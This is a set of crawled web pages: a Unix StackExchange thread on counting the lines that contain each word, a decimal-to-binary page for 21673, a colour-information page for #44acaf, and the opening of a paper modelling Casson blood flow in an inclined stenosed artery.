https://unix.stackexchange.com/questions/492501/count-lines-containing-word
[ "# Count lines containing word\n\nI have a file with multiple lines. I want to know, for each word that appears in the total file, how many lines contain that word, for example:\n\n``````0 hello world the man is world\n1 this is the world\n2 a different man is the possible one\n``````\n\nThe result I'm expecting is:\n\n``````0:1\n1:1\n2:1\na:1\ndifferent:1\nhello:1\nis:3\nman:2\none:1\npossible:1\nthe:3\nthis:1\nworld:2\n``````\n\nNote that the count for \"world\" is 2, not 3, since the word appears on 2 lines. Because of this, translating blanks to newline chars wouldn't be the exact solution.\n\nAnother Perl variant, using List::Util\n\n``````\\$ perl -MList::Util=uniq -alne '\nmap { \\$h{\\$_}++ } uniq @F }{ for \\$k (sort keys %h) {print \"\\$k: \\$h{\\$k}\"}\n' file\n0: 1\n1: 1\n2: 1\na: 1\ndifferent: 1\nhello: 1\nis: 3\nman: 2\none: 1\npossible: 1\nthe: 3\nthis: 1\nworld: 2\n``````\n\nStraightfoward-ish in bash:\n\n``````declare -A wordcount\n# unique words on this line\ndeclare -A uniq\nfor word in \"\\${words[@]}\"; do\nuniq[\\$word]=1\ndone\n# accumulate the words\nfor word in \"\\${!uniq[@]}\"; do\n((wordcount[\\$word]++))\ndone\nunset uniq\ndone < file\n``````\n\nLooking at the data:\n\n``````\\$ declare -p wordcount\ndeclare -A wordcount='([possible]=\"1\" [one]=\"1\" [different]=\"1\" [this]=\"1\" [a]=\"1\" [hello]=\"1\" [world]=\"2\" [man]=\"2\" =\"1\" =\"1\" =\"1\" [is]=\"3\" [the]=\"3\" )'\n``````\n\nand formatting as you want:\n\n``````\\$ printf \"%s\\n\" \"\\${!wordcount[@]}\" | sort | while read key; do echo \"\\$key:\\${wordcount[\\$key]}\"; done\n0:1\n1:1\n2:1\na:1\ndifferent:1\nhello:1\nis:3\nman:2\none:1\npossible:1\nthe:3\nthis:1\nworld:2\n``````\n\nIt's a pretty straight-forward perl script:\n\n``````#!/usr/bin/perl -w\nuse strict;\n\nmy %words = ();\nwhile (<>) {\nchomp;\nmy %linewords = ();\nmap { \\$linewords{\\$_}=1 } split / /;\nforeach my \\$word (keys %linewords) {\n\\$words{\\$word}++;\n}\n}\n\nforeach my \\$word (sort keys %words) {\nprint \"\\$word:\\$words{\\$word}\\n\";\n}\n``````\n\nThe basic idea is to loop over the input; for each line, split it into words, then save those words into a hash (associative array) in order to remove any duplicates, then loop over that array of words and add one to an overall counter for that word. At the end, report on the words and their counts.\n\n• A slight problem with this is in my opinion that it does not respect what the usual definition of a word is, since it splits on a single space character. If two spaces were found somewhere, an empty string inbetween would be considered a word as well if I'm not mistaken. Let alone if words were separated by other punctuation characters. Of course, it was not specified in the question whether \"word\" is understood as the programmer's concept of a \"word\", or as a word of a natural language. – Larry Jan 4 '19 at 16:38\n\nA solution that calls several programs from a shell:\n\n`fmt -1 words.txt | sort -u | xargs -Ipattern sh -c 'echo \"pattern:\\$(grep -cw pattern words.txt)\"'`\n\nA little explanation:\n\nThe `fmt -1 words.txt` prints out all the words, 1 per line, and the `| sort -u` sorts this output and extracts only the unique words from it.\n\nIn order to count the occurences of a word in a file, one can use `grep` (a tool meant to search files for patterns). By passing the `-cw` option, grep gives the number of word matches it finds. 
So `grep -cw pattern words.txt` gives the number of lines containing `pattern` as a word.\n\nThe tool `xargs` allows us to do this for every single word output by `sort`. The `-Ipattern` means that it will execute the following command multiple times, replacing each occurrence of pattern with a word it reads from standard input, which is what it gets from `sort`.\n\nThe indirection with `sh` is needed because `xargs` only knows how to execute a single program, given its name, passing everything else as arguments to it. `xargs` does not handle things like command substitution. The `\\$(...)` is command substitution in the above snippet, as it substitutes the output from `grep` into `echo`, allowing it to be formatted correctly. Since we need the command substitution, we must use the `sh -c` command, which runs whatever it receives as an argument in its own shell.\n\n• An optimisation to this approach: `fmt -1 words.txt | sort | uniq -c | awk '{ print \\$2 \":\" \\$1 }'` – matja Jan 5 '19 at 0:14\n• @matja is `sort | uniq -c` more efficient than `sort -u`? – vikarjramun Jan 5 '19 at 3:31\n• @vikarjramun no, but `uniq -c` gives you the counts of each word in one pass, so you don't have to use xargs to do multiple passes of the input file for each word. – matja Jan 5 '19 at 10:11\n• @matja: I actually made the answer you provided before the current one. However, it does not do what OP asked for. I misread the question at first entirely as well, and was corrected by glenn jackman. What you are suggesting would count every occurrence of each word. What OP asked for is to count the number of lines each word occurs in at least once. – Larry Jan 5 '19 at 10:17\n\nAnother simple alternative would be to use Python (>=3.6). This solution has the same problem as the one mentioned by @Larry in his comment.\n\n``````from collections import Counter\n\nwith open(\"words.txt\") as f:\n    c = Counter(word for line in [line.strip().split() for line in f] for word in set(line))\n\nfor word, occurrence in sorted(c.items()):\n    print(f'{word}:{occurrence}')\n    # for Python 2.7.x compatibility you can replace the above line with\n    # the following one:\n    # print('{}:{}'.format(word, occurrence))\n``````\n\nA more explicit version of the above:\n\n``````from collections import Counter\n\nFILENAME = \"words.txt\"\n\ndef find_unique_words():\n    with open(FILENAME) as f:\n        lines = [line.strip().split() for line in f]\n\n    unique_words = Counter(word for line in lines for word in set(line))\n    return sorted(unique_words.items())\n\ndef print_unique_words():\n    unique_words = find_unique_words()\n    for word, occurrence in unique_words:\n        print(f'{word}:{occurrence}')\n\ndef main():\n    print_unique_words()\n\nif __name__ == '__main__':\n    main()\n``````\n\nOutput:\n\n``````0:1\n1:1\n2:1\na:1\ndifferent:1\nhello:1\nis:3\nman:2\none:1\npossible:1\nthe:3\nthis:1\nworld:2\n``````\n\nThe above also assumes that words.txt is in the same directory as the script. 
Note that this is not much different from other solutions provided here, but perhaps somebody will find it useful.\n\nTrying to do it with awk:\n\ncount.awk:\n\n``````#!/usr/bin/awk -f\n# count lines containing each word\n\n{\n    for (i = 1; i <= NF; i++) {\n        word_in_a_line[\\$i]++\n        if (word_in_a_line[\\$i] == 1) {\n            word_line_count[\\$i]++\n        }\n    }\n\n    delete word_in_a_line\n}\n\nEND {\n    for (word in word_line_count) {\n        printf \"%s:%d\\n\", word, word_line_count[word]\n    }\n}\n``````\n\nRun it by:\n\n``````\\$ awk -f count.awk ./test.data | sort\n``````\n\n``````echo \"0 hello world the man is world\n1 this is the world\n2 a different man is the possible one\" | while IFS=\\$'\\n' read -r line; do echo \"\\$line\" | tr ' ' '\\n' | sort -u; done | sort | uniq -c\n\n1 0\n1 1\n1 2\n1 a\n1 different\n1 hello\n3 is\n2 man\n1 one\n1 possible\n3 the\n1 this\n2 world\n``````\n\nI looped over the unique words on each line and passed them to `uniq -c`.\n\nEdit: I did not see glenn's answer. I found it strange to not see a bash answer.\n\nSimple, though it doesn't mind reading the file many times:\n\n``````sed 's/ /\\n/g' file.txt | sort | uniq | while read -r word; do\n    printf \"%s:%d\\n\" \"\\$word\" \"\\$(grep -Fw \"\\$word\" file.txt | wc -l)\"\ndone\n``````\n\nEDIT: Despite converting spaces to newlines, this counts the lines that have an occurrence of each word and not the occurrences of the words themselves. It gives the result:\n\n``````0:1\n1:1\n2:1\na:1\ndifferent:1\nhello:1\nis:3\nman:2\none:1\npossible:1\nthe:3\nthis:1\nworld:2\n``````\n\nwhich is character-by-character identical to OP's example result.\n\n• Read the question again. It literally says `translating blanks to newline chars wouldn't be the exact solution`. – Sparhawk Jan 5 '19 at 9:59\n• @Sparhawk Read the answer again. This does give the answer he gave as example, including giving the result of 2 instead of 3 for world. He meant that doing something like `sed 's/ /\\n/g' | sort | uniq -c` would not work because it'd give the answer 3 for world, but that's not what this answer does. It correctly counts the lines where the words occur and not the occurrences themselves, just like OP wanted. – JoL Jan 6 '19 at 7:03\n• Ah right, apologies! I would recommend putting in an explanation of your code, which is both helpful to the questioner, and clarifies what it does. Also, as a minor point, you probably want `read -r` here. – Sparhawk Jan 6 '19 at 9:38" ]
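To make the distinction at the heart of the question concrete, here is a short Python sketch (an illustrative addition reusing the sample data from the question, not code from the thread): counting every occurrence gives `world` → 3, while counting distinct lines gives `world` → 2, matching the expected output above.

```python
from collections import Counter

# Sample data from the question.
lines = [
    "0 hello world the man is world",
    "1 this is the world",
    "2 a different man is the possible one",
]

# Naive count: every occurrence of every word ("world" appears twice on line 0).
per_occurrence = Counter(word for line in lines for word in line.split())

# Per-line count: set() deduplicates words within each line first.
per_line = Counter(word for line in lines for word in set(line.split()))

print(per_occurrence["world"])  # 3
print(per_line["world"])        # 2, as the OP expects
```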
https://www.decimaltobinary.com/21673-in-binary
[ "# 21673 in Binary\n\nWhat is 21673 in binary? Below we show you the result of the decimal to binary conversion straightaway. If you want to know how to convert 21673 to binary please read the instructions on the homepage.\n\nBinary 21673 = 1010100101010012\nThe binary for 21673 is 101010010101001\n\nAs any other integer, 21673 can be written as sum of potencies to the power of 2, known as binary code. Here’s the proof that 101010010101001 is the binary of 21673:\n\n1×2^14 + 0x2^13 + 1×2^12 + 0x2^11 + 1×2^10 + 0x2^9 + 0x2^8 + 1×2^7 + 0x2^6 + 1×2^5 + 0x2^4 + 1×2^3 + 0x2^2 + 0x2^1 + 1×2^0 = 21673\n\nYet, make sure to learn about 21673 in binary signed in the next section.\n\nIf you like to know the binary code for any other decimal number than 21673 please use our converter below. Enter any number and hit Decimal to Binary:\n\nSimilar decimal to binary conversions on this web site include:\n\n## Convert 21673 to Binary\n\nNow you already know the most important thing about 21673 in binary form. 101010010101001 is binary 21673. That is if the binary in unsigned.", null, "If 21673 in binary is signed such as with two’s complement, then the binary code has a number of trailing zeroes, e.g. 000101010010101001 in which the leftmost bit is the sign bit, followed perhaps by more trailing 0’s, and then by magnitude bits.\n\nThe reason to have the binary 21673 signed is to accommodate for negative numbers, in which case the sign bit is 1 in our example. Therefore, minus 21673 signed using two’s complement, will start with one or more 1’s, but the exact code for -21673 decimal to binary depends on the signed number representation system and number of bits available.\n\nHere you can convert binary to decimal. If you like to know what decimal 21673 is on other number systems, we have that too:" ]
[ null, "data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%200%200'%3E%3C/svg%3E", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9013973,"math_prob":0.9806205,"size":2212,"snap":"2020-34-2020-40","text_gpt3_token_len":607,"char_repetition_ratio":0.18115942,"word_repetition_ratio":0.010126582,"special_character_ratio":0.33047017,"punctuation_ratio":0.088495575,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9977219,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-09-25T15:21:37Z\",\"WARC-Record-ID\":\"<urn:uuid:59e2a865-3141-48b3-8422-f6c459e962ca>\",\"Content-Length\":\"35247\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:8ddddc58-c8c7-477b-a5a3-59264ed6889b>\",\"WARC-Concurrent-To\":\"<urn:uuid:178d1ae7-5ae4-45dc-893e-b4e2602d320a>\",\"WARC-IP-Address\":\"104.24.108.35\",\"WARC-Target-URI\":\"https://www.decimaltobinary.com/21673-in-binary\",\"WARC-Payload-Digest\":\"sha1:7SW4XR7GQ37QTYOGRJPBYL6DNHT6TTEE\",\"WARC-Block-Digest\":\"sha1:RKVUM526E3YW2OLXO2XL4O26RS2WTI2F\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-40/CC-MAIN-2020-40_segments_1600400227524.63_warc_CC-MAIN-20200925150904-20200925180904-00249.warc.gz\"}"}
https://www.colorhexa.com/44acaf
[ "# #44acaf Color Information\n\nIn a RGB color space, hex #44acaf is composed of 26.7% red, 67.5% green and 68.6% blue. Whereas in a CMYK color space, it is composed of 61.1% cyan, 1.7% magenta, 0% yellow and 31.4% black. It has a hue angle of 181.7 degrees, a saturation of 44% and a lightness of 47.6%. #44acaf color hex could be obtained by blending #88ffff with #00595f. Closest websafe color is: #339999.\n\n• R 27\n• G 67\n• B 69\nRGB color chart\n• C 61\n• M 2\n• Y 0\n• K 31\nCMYK color chart\n\n#44acaf color description : Dark moderate cyan.\n\n# #44acaf Color Conversion\n\nThe hexadecimal color #44acaf has RGB values of R:68, G:172, B:175 and CMYK values of C:0.61, M:0.02, Y:0, K:0.31. Its decimal value is 4500655.\n\nHex triplet RGB Decimal 44acaf `#44acaf` 68, 172, 175 `rgb(68,172,175)` 26.7, 67.5, 68.6 `rgb(26.7%,67.5%,68.6%)` 61, 2, 0, 31 181.7°, 44, 47.6 `hsl(181.7,44%,47.6%)` 181.7°, 61.1, 68.6 339999 `#339999`\nCIE-LAB 64.825, -28.573, -10.47 24.872, 33.827, 45.774 0.238, 0.324, 33.827 64.825, 30.431, 200.125 64.825, -41.514, -11.52 58.161, -25.448, -5.949 01000100, 10101100, 10101111\n\n# Color Schemes with #44acaf\n\n• #44acaf\n``#44acaf` `rgb(68,172,175)``\n• #af4744\n``#af4744` `rgb(175,71,68)``\nComplementary Color\n• #44af7d\n``#44af7d` `rgb(68,175,125)``\n• #44acaf\n``#44acaf` `rgb(68,172,175)``\n• #4477af\n``#4477af` `rgb(68,119,175)``\nAnalogous Color\n• #af7d44\n``#af7d44` `rgb(175,125,68)``\n• #44acaf\n``#44acaf` `rgb(68,172,175)``\n• #af4477\n``#af4477` `rgb(175,68,119)``\nSplit Complementary Color\n• #acaf44\n``#acaf44` `rgb(172,175,68)``\n• #44acaf\n``#44acaf` `rgb(68,172,175)``\n• #af44ac\n``#af44ac` `rgb(175,68,172)``\n• #44af47\n``#44af47` `rgb(68,175,71)``\n• #44acaf\n``#44acaf` `rgb(68,172,175)``\n• #af44ac\n``#af44ac` `rgb(175,68,172)``\n• #af4744\n``#af4744` `rgb(175,71,68)``\n• #2f7678\n``#2f7678` `rgb(47,118,120)``\n• #36888a\n``#36888a` `rgb(54,136,138)``\n• #3d9a9d\n``#3d9a9d` `rgb(61,154,157)``\n• #44acaf\n``#44acaf` `rgb(68,172,175)``\n• #51b8bb\n``#51b8bb` `rgb(81,184,187)``\n• #63c0c3\n``#63c0c3` `rgb(99,192,195)``\n• #76c7ca\n``#76c7ca` `rgb(118,199,202)``\nMonochromatic Color\n\n# Alternatives to #44acaf\n\nBelow, you can see some colors close to #44acaf. Having a set of related colors can be useful if you need an inspirational alternative to your original color choice.\n\n• #44af97\n``#44af97` `rgb(68,175,151)``\n• #44afa0\n``#44afa0` `rgb(68,175,160)``\n• #44afa9\n``#44afa9` `rgb(68,175,169)``\n• #44acaf\n``#44acaf` `rgb(68,172,175)``\n• #44a3af\n``#44a3af` `rgb(68,163,175)``\n• #449aaf\n``#449aaf` `rgb(68,154,175)``\n• #4491af\n``#4491af` `rgb(68,145,175)``\nSimilar Colors\n\n# #44acaf Preview\n\nThis text has a font color of #44acaf.\n\n``<span style=\"color:#44acaf;\">Text here</span>``\n#44acaf background color\n\nThis paragraph has a background color of #44acaf.\n\n``<p style=\"background-color:#44acaf;\">Content here</p>``\n#44acaf border color\n\nThis element has a border color of #44acaf.\n\n``<div style=\"border:1px solid #44acaf;\">Content here</div>``\nCSS codes\n``.text {color:#44acaf;}``\n``.background {background-color:#44acaf;}``\n``.border {border:1px solid #44acaf;}``\n\n# Shades and Tints of #44acaf\n\nA shade is achieved by adding black to any pure hue, while a tint is created by mixing white to any pure color. 
In this example, #020505 is the darkest color, while #f6fbfc is the lightest one.\n\n• #020505\n``#020505` `rgb(2,5,5)``\n• #081314\n``#081314` `rgb(8,19,20)``\n• #0d2122\n``#0d2122` `rgb(13,33,34)``\n• #132f30\n``#132f30` `rgb(19,47,48)``\n• #183d3e\n``#183d3e` `rgb(24,61,62)``\n• #1e4b4c\n``#1e4b4c` `rgb(30,75,76)``\n• #23595a\n``#23595a` `rgb(35,89,90)``\n• #296768\n``#296768` `rgb(41,103,104)``\n• #2e7476\n``#2e7476` `rgb(46,116,118)``\n• #348285\n``#348285` `rgb(52,130,133)``\n• #399093\n``#399093` `rgb(57,144,147)``\n• #3f9ea1\n``#3f9ea1` `rgb(63,158,161)``\n• #44acaf\n``#44acaf` `rgb(68,172,175)``\n• #4db7ba\n``#4db7ba` `rgb(77,183,186)``\n• #5bbcbf\n``#5bbcbf` `rgb(91,188,191)``\n• #69c2c5\n``#69c2c5` `rgb(105,194,197)``\n• #77c8ca\n``#77c8ca` `rgb(119,200,202)``\n• #85ced0\n``#85ced0` `rgb(133,206,208)``\n• #93d3d5\n``#93d3d5` `rgb(147,211,213)``\n• #a2d9db\n``#a2d9db` `rgb(162,217,219)``\n• #b0dfe0\n``#b0dfe0` `rgb(176,223,224)``\n• #bee5e6\n``#bee5e6` `rgb(190,229,230)``\n• #cceaeb\n``#cceaeb` `rgb(204,234,235)``\n• #daf0f1\n``#daf0f1` `rgb(218,240,241)``\n• #e8f6f6\n``#e8f6f6` `rgb(232,246,246)``\n• #f6fbfc\n``#f6fbfc` `rgb(246,251,252)``\nTint Color Variation\n\n# Tones of #44acaf\n\nA tone is produced by adding gray to any pure hue. In this case, #738080 is the less saturated color, while #03eaf0 is the most saturated one.\n\n• #738080\n``#738080` `rgb(115,128,128)``\n• #69898a\n``#69898a` `rgb(105,137,138)``\n• #609293\n``#609293` `rgb(96,146,147)``\n• #579a9c\n``#579a9c` `rgb(87,154,156)``\n• #4da3a6\n``#4da3a6` `rgb(77,163,166)``\n• #44acaf\n``#44acaf` `rgb(68,172,175)``\n• #3bb5b8\n``#3bb5b8` `rgb(59,181,184)``\n• #31bec2\n``#31bec2` `rgb(49,190,194)``\n• #28c6cb\n``#28c6cb` `rgb(40,198,203)``\n• #1fcfd4\n``#1fcfd4` `rgb(31,207,212)``\n• #15d8de\n``#15d8de` `rgb(21,216,222)``\n• #0ce1e7\n``#0ce1e7` `rgb(12,225,231)``\n• #03eaf0\n``#03eaf0` `rgb(3,234,240)``\nTone Color Variation\n\n# Color Blindness Simulator\n\nBelow, you can see how #44acaf is perceived by people affected by a color vision deficiency. This can be useful if you need to ensure your color combinations are accessible to color-blind users.\n\nMonochromacy\n• Achromatopsia 0.005% of the population\n• Atypical Achromatopsia 0.001% of the population\nDichromacy\n• Protanopia 1% of men\n• Deuteranopia 1% of men\n• Tritanopia 0.001% of the population\nTrichromacy\n• Protanomaly 1% of men, 0.01% of women\n• Deuteranomaly 6% of men, 0.4% of women\n• Tritanomaly 0.01% of the population" ]
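The shade/tint construction just described is easy to reproduce programmatically. Here is a small Python sketch (an illustrative addition; ColorHexa's exact step sizes and rounding may differ) that mixes the base color toward black for shades and toward white for tints:

```python
def hex_to_rgb(h: str):
    """'#44acaf' -> (68, 172, 175)"""
    h = h.lstrip("#")
    return tuple(int(h[i:i + 2], 16) for i in (0, 2, 4))

def mix(color, target, t: float) -> str:
    """Linearly interpolate each channel from color toward target by fraction t."""
    return "#%02x%02x%02x" % tuple(round(a + (b - a) * t) for a, b in zip(color, target))

base = hex_to_rgb("#44acaf")
shades = [mix(base, (0, 0, 0), k / 13) for k in range(1, 13)]       # toward black
tints = [mix(base, (255, 255, 255), k / 13) for k in range(1, 13)]  # toward white
print(shades[0], tints[-1])  # first shade step, lightest tint step
```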
https://joems.springeropen.com/articles/10.1186/s42787-022-00157-8
[ "# Casson rheological flow model in an inclined stenosed artery with non-Darcian porous medium and quadratic thermal convection\n\n## Abstract\n\nThe current study investigates the combined response of the Darcy–Brinkman–Forchheimer and nonlinear thermal convection influence among other fluid parameters on Casson rheology (blood) flow through an inclined tapered stenosed artery with magnetic effect. Considering the remarkable importance of mathematical models to the physical behavior of fluid flow in human systems for scientific, biological, and industrial use, the present model predicts the motion and heat transfer of blood flow through tapered stenosed arteries under some underline conditions. The momentum and energy equations for the model were obtained and solved using the collocation method with the Legendre polynomial basis function. The expressions obtained for the velocity and temperature were graphed to show the effects of the Darcy–Brinkman–Forchheimer term, Casson parameters, and nonlinear thermal convection term among others. The results identified that a higher Darcy–Brinkman number slows down the blood temperature, while continuous injection of the Casson number decreases both velocity and temperature distribution.\n\n## Introduction\n\nStenosis refers to a strange narrowing in a blood vessel or other tubular organs such as the foramina and canal. It is also known as urethral stricture. Atherosclerosis is the majorly cause of stenosis, a form of the disease in which the wall of the artery develops lesions (abnormalities that can eventually lead to narrowing due to deposits of fats). Blood is a non-Newtonian fluid, that is, the viscosity varies with the shear rate which makes it a shear-thinning fluid. The study of mathematical biology and computational fluid mechanics has enhanced the work of researchers to inspect the mathematical and physical behavior of blood flow for use in medicine and other industrial applications. Among the novel, investigations in the area of tapered stenosed arteries include the work of Abubakar and Adeoye , and Abubakar et al. study of steady blood flow through stenosis under the influence of a magnetic field. The influence of MHD blood flow and heat transfer through an inclined porous stenosed artery with variable viscosity is presented by Tripathi and Kumar . Chaturani and Samy discussed the pulsatile flow of Casson fluid through arteries (stenosed) with blood application. Bio-inspired peristaltic propulsion of hybrid nanofluid flow with hybrid nanoparticle aggregation was discussed by Bhatti et al. .\n\nRecently, Sharma et al. investigated the flow of blood through a multi-stenosed tapered artery; the study was centered on the slip flow and thermal radiation influence with the inclusion of hybrid nanoparticles (Au-Al2O3/Blood) and second law analysis; thus, the impact of Au and slip velocity is fully remarked. Poonam et al. utilized the finite difference (C-N) scheme to examine the heat and mass transfer flow of pulsatile blood through a curved artery subject to hybrid nanoparticles (Au-Al2O3/blood) aggregation, and Ikbar et al. enumerated their model for the non-Newtonian flow of blood through a stenosed artery in the presence of a transverse magnetic field. Blood is taken into account as the third-grade non-Newtonian fluid in the work presented by Akbarzedeh ; the study revealed that the mean value of the velocity increases, and the amplitude of the velocity remains constant as the pressure gradient rises.\n\nMandal et al. 
developed and discussed a two-dimensional mathematical model to study the effect of external body acceleration on non-Newtonian blood flow in a stenosed artery, where the blood is characterized by the generalized power-law model. Hayat et al. considered Darcy–Brinkman–Forchheimer flow with Cattaneo–Christov homogeneous–heterogeneous reactions; therein, MHD effects are considered on the flow of blood in the stenosed artery. Bio-inspired peristaltic propulsion of a hybrid nanofluid flow with nanoparticles subject to magnetic effects was carried out by Bhatti and Abdelsalam, and their work demonstrated how Ta-NPs can be employed for the removal of unwanted reactive oxygen species in both small and large animals as well as in biomedical systems. Krishna [12, 13] studied the effect of heat and mass flux conditions on the magnetohydrodynamic flow of Casson fluid over a curved stretching surface. Mustafa investigated the pipe flow of an Eyring-Powell fluid, enumerating its impact on flow and heat transfer. Mustafa also studied second law phenomena in thermal transport through a metallic porous channel, in which the impact of the Brinkman–Darcy model is enumerated, to mention but a few among the numerous investigations. Hemodynamic characteristics of gold nanoparticle blood flow through a tapered stenosed vessel with variable nanofluid viscosity were discussed by Elnaqeeb et al. Beckermann et al. presented a numerical study of non-Darcian natural convection in an enclosure filled with a porous medium; the work showed that Forchheimer's extension must be included for Prandtl numbers less than one. In related work, Bhargava et al. explored the finite element analysis of drug diffusion and transient pulsatile magneto-hemodynamic non-Newtonian flow in a porous channel.\n\nNumerical methods are among the simplest and most approachable ways of obtaining an approximate solution to systems of highly nonlinear equations, and the collocation method is one of them. The current investigation utilizes one of the orthogonal polynomial families, the Legendre polynomials, combined with the collocation method. Studies that have used this approach include the work of Mallawi et al., in which a space-time variable fractional-order advection-dispersion equation was solved computationally at Legendre collocation points, and that of Guner and Yalcinbas on the Legendre collocation method for solving nonlinear differential equations, to mention just a few. Motivated by all the above-mentioned research, this article presents the effects of a non-Darcian porous medium and quadratic thermal convection behavior on the equations governing blood flow through an inclined tapered stenosed artery. The model's nonlinear equations have been solved numerically using the Legendre collocation method with the aid of Wolfram Mathematica 11.3 under the defined boundary conditions. Codes generated in MAPLE 18 are used to show graphically the effects of the Darcy–Brinkman–Forchheimer term, Casson parameter, nonlinear thermal convection term, and variation in the inclination angle on the blood flow in the inclined stenosed artery.\n\n## Problem formulation\n\nBlood is taken to flow axially through a narrow cylindrical artery, as shown in Fig. 1. Let ($$r$$, $$\theta$$, $$z$$) be the cylindrical polar coordinate system, and let $$\tilde{u}$$, $$\tilde{v}$$, and $$\tilde{w}$$ be the velocity components in the $$r$$, $$\theta$$, and $$z$$ directions. 
We consider magnetohydrodynamics (MHD) Newtonian fluid of density $$\\rho$$ and variable viscosity $$\\mu$$ flowing through a porous material in a tube having a finite length $$L$$. The stenosed artery is inclined at the angle $$\\gamma$$ from the vertical axis with outside applied radiation $$q_{r}$$ and magnetic field $$M$$.\n\nThe governing equations for the model are as follows:\n\nContinuity equation\n\n$$\\frac{{\\partial \\tilde{u}}}{{\\partial \\tilde{r}}} + \\;\\frac{{\\partial \\tilde{v}}}{{\\partial \\tilde{z}}} + \\frac{{\\tilde{u}}}{{\\tilde{r}}} = 0$$\n(1)\n\nMomentum equation (r-direction)\n\n$$\\rho \\left[ {\\tilde{u}\\frac{{\\partial \\tilde{u}}}{{\\partial \\tilde{r}}} + \\tilde{v}\\frac{{\\partial \\tilde{u}}}{{\\partial \\tilde{z}}}} \\right] = \\; - \\frac{{\\partial \\tilde{P}}}{{\\partial \\tilde{r}}} + \\frac{\\partial }{{\\partial \\tilde{r}}}\\left[ {2\\mu \\frac{{\\partial \\tilde{u}}}{{\\partial \\tilde{r}}}} \\right] + \\frac{2\\mu }{{\\tilde{r}}}\\left[ {\\frac{{\\partial \\tilde{u}}}{{\\partial \\tilde{r}}} - \\frac{{\\tilde{u}}}{{\\tilde{r}}}} \\right] + \\frac{\\partial }{{\\partial \\tilde{z}}}\\left[ {\\mu \\left( {\\frac{{\\partial \\tilde{u}}}{{\\partial \\tilde{z}}} + \\frac{{\\partial \\tilde{v}}}{{\\partial \\tilde{r}}}} \\right)} \\right]$$\n(2)\n\nMomentum equation (z-direction)\n\n\\begin{aligned} \\rho \\left[ {\\tilde{u}\\frac{{\\partial \\tilde{v}}}{{\\partial \\tilde{r}}} + \\tilde{v}\\frac{{\\partial \\tilde{v}}}{{\\partial \\tilde{z}}}} \\right] & = - \\frac{{\\partial \\tilde{P}}}{{\\partial \\tilde{z}}} + \\left( {1 + \\frac{1}{\\beta }} \\right)\\left\\{ {\\frac{\\partial }{{\\partial \\tilde{z}}}\\left[ {\\left( {2\\mu \\frac{{\\partial \\tilde{v}}}{{\\partial \\tilde{z}}}} \\right)} \\right] + \\frac{1}{{\\tilde{r}}}\\frac{\\partial }{{\\partial \\tilde{r}}}\\left[ {\\mu \\left( {\\frac{{\\partial \\tilde{u}}}{{\\partial \\tilde{z}}} + \\frac{{\\partial \\tilde{v}}}{{\\partial \\tilde{r}}}} \\right)} \\right]} \\right\\} - \\sigma_{1} \\mu_{m}^{2} H_{0}^{2} \\tilde{v} \\\\ & \\quad + \\rho g[\\alpha_{1} \\left( {T - T_{0} } \\right) + \\alpha_{2} \\left( {T - T_{0} } \\right)^{2} ]{\\text{cos}}\\gamma - \\;\\left( {1 + \\frac{1}{\\beta }} \\right)\\frac{{\\mu \\tilde{V}}}{{K_{1} }} - \\frac{{b^{*} v^{2} }}{{k_{1} }} \\\\ \\end{aligned}\n(3)\n\nEnergy equation\n\n$$\\rho c_{p} \\left[ {\\tilde{u}\\frac{\\partial T}{{\\partial \\tilde{r}}} + \\tilde{v}\\frac{\\partial T}{{\\partial \\tilde{r}}}} \\right] = \\frac{k}{{\\tilde{r}}}\\frac{\\partial }{{\\partial \\tilde{r}}}\\left[ {\\tilde{r}\\frac{\\partial T}{{\\partial \\tilde{r}}}} \\right] + k\\frac{{\\partial^{2} T}}{{\\partial \\tilde{z}^{2} }} + 2\\mu \\left( {1 + \\frac{1}{\\beta }} \\right)\\, + \\left\\{ {\\left[ {\\left( {\\frac{{\\partial \\tilde{u}}}{{\\partial \\tilde{z}}}} \\right)^{2} + \\left( {\\frac{{\\tilde{u}}}{{\\tilde{r}}}} \\right)^{2} + \\left( {\\frac{{\\partial \\tilde{v}}}{{\\partial \\tilde{z}}}} \\right)^{2} } \\right] + \\mu \\left( {\\frac{{\\partial \\tilde{u}}}{{\\partial \\tilde{z}}} + \\frac{{\\partial \\tilde{v}}}{{\\partial \\tilde{r}}}} \\right)^{2} } \\right\\} - \\frac{{\\partial q_{r} }}{{\\partial \\tilde{r}}}$$\n(4)\n\nwhere $$\\frac{{b^{*} v^{2} }}{{k_{1} }}$$ is the Darcy–Forchheimer's term, $$\\tilde{u}$$, $$\\tilde{v}$$, and $$\\tilde{w}$$ are the velocity components in the radial and axial directions, respectively. 
$$\\sigma_{1}$$ is the electrical conductivity, $$k$$ is the thermal conductivity, and $$C_{{\\text{p}}}$$ is the specific heat at constant pressure. The differential equation for the radiative flux $$q_{{\\text{r}}}$$ is given in the following equation:\n\n$$\\frac{{\\partial^{2} q_{{\\text{r}}} }}{{\\partial \\tilde{r}^{2} }} - 3\\alpha_{v}^{2} q_{{\\text{r}}} - 16\\alpha_{v} \\sigma T^{3} \\frac{\\partial T}{{\\partial \\overset{\\lower0.5em\\hbox{\\smash{\\scriptscriptstyle\\smile}}}{r} }} = 0,$$\n(5)\n\nwhere $$\\sigma$$ is the Stefan–Boltzmann constant. With the assumption of thin blood, $$\\alpha_{v} { \\ll }1.$$ Then, $$T_{0}$$ is the blood temperature at the stenosed region and T is the local temperature of the blood, then (5) can be solved to\n\n$$\\frac{{\\partial q_{{\\text{r}}} }}{{\\partial \\tilde{r}}} = 4\\alpha_{v}^{2} \\left( {T - T_{0} } \\right),$$\n(6)\n\nThe variable viscosity of the flow of blood is expressed by the formula:\n\n$$\\mu \\left( {\\tilde{r}} \\right) = \\mu_{0} (\\lambda h\\left( {\\tilde{r}} \\right) + 1),$$\n(7)\n\nwhere $$h\\left( {\\tilde{r}} \\right) = H\\left[ {1 - \\left( {\\frac{{\\tilde{r}}}{{d_{0} }}} \\right)^{m} } \\right]$$ and $$H_{r} = \\lambda H$$ in which $$\\lambda$$ is having a numerical value of 2.5 and H is the maximum hematocrit at the center of the artery, $$m$$ is the parameter that decides the exact shape of the blood velocity profile and $$H_{r}$$ is the hematocrit 